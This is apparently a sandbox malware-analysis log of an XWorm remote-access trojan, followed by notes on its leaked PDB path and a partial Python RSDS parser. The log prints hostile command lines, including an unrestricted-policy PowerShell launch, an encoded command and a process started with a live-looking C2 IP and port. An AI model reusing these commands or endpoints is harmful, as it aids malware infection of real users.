Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.RegSvcs.exe.68d03d8.4.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.RegSvcs.exe.2c02294.1.raw.unpack, Helper.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winPS1@19/15@0/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\cbXZx2AFPWwoNOX6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhkm5ooc.vyf.ps1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ParentProcessID=6092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_Process Where ParentProcessID=3320
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: Wn0FGQ53RW.ps1 Virustotal: Detection: 9%
Source: Wn0FGQ53RW.ps1 ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Wn0FGQ53RW.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 176.113.115.228 4412 P0WER 4C7A640DCC0EFBFFD7AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4E45.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dlnashext.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wpdshext.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: ninput.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe Section loaded: sxs.dll
Source: C:\Windows\explorer.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: profapi.dll
Source: C:\Windows\explorer.exe Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\explorer.exe Section loaded: duser.dll
Source: C:\Windows\explorer.exe Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll
Source: C:\Windows\explorer.exe Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe Section loaded: edputil.dll
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll
Source: C:\Windows\explorer.exe Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe Section loaded: winmm.dll
Source: C:\Windows\explorer.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: secur32.dll
Source: C:\Windows\explorer.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe Section loaded: cscui.dll
Source: C:\Windows\explorer.exe Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe Section loaded: provsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb" source: RegSvcs.exe, 00000002.00000002.2250081540.0000000002C62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2269118993.00000000068D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2250081540.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 00000006.00000002.2159298688.0000000000402000.00000040.00000400.00020000.00000000.sdmp
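The PDB path above is one of the most useful strings in the report: it survives in the RegSvcs.exe and cvtres.exe memory dumps because the injected DLL was built in Debug configuration, and it names both the builder's Windows account (XCoder) and the kit it was compiled from (XWorm V5.2). Such paths live in the CodeView RSDS debug record of the PE: a 4-byte "RSDS" signature, a 16-byte GUID, a 32-bit age and a NUL-terminated path. The following script is an added example, not Joe Sandbox's extraction code: it scans a raw memory blob for RSDS records, discards signatures that merely occur by chance in data, and pulls out the fields an analyst pivots on. The GUID, age and surrounding bytes of the sample blob are constructed; only the path is taken from the report.

```python
import struct
import uuid

# The path the report recovered from the RegSvcs.exe and cvtres.exe dumps.
PDB_PATH = r"C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\DLL\DLL\obj\Debug\DLL.pdb"


def build_rsds(guid, age, path):
    """Serialise a CodeView 7.0 (RSDS) record as the linker writes it:
    signature, GUID in little-endian field order, 32-bit age, NUL-terminated UTF-8 path."""
    return b"RSDS" + guid.bytes_le + struct.pack("<I", age) + path.encode("utf-8") + b"\x00"


# Constructed memory fragment: a decoy "RSDS" that is not a debug record, followed
# by a real one. GUID and age are invented; only PDB_PATH comes from the report.
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")
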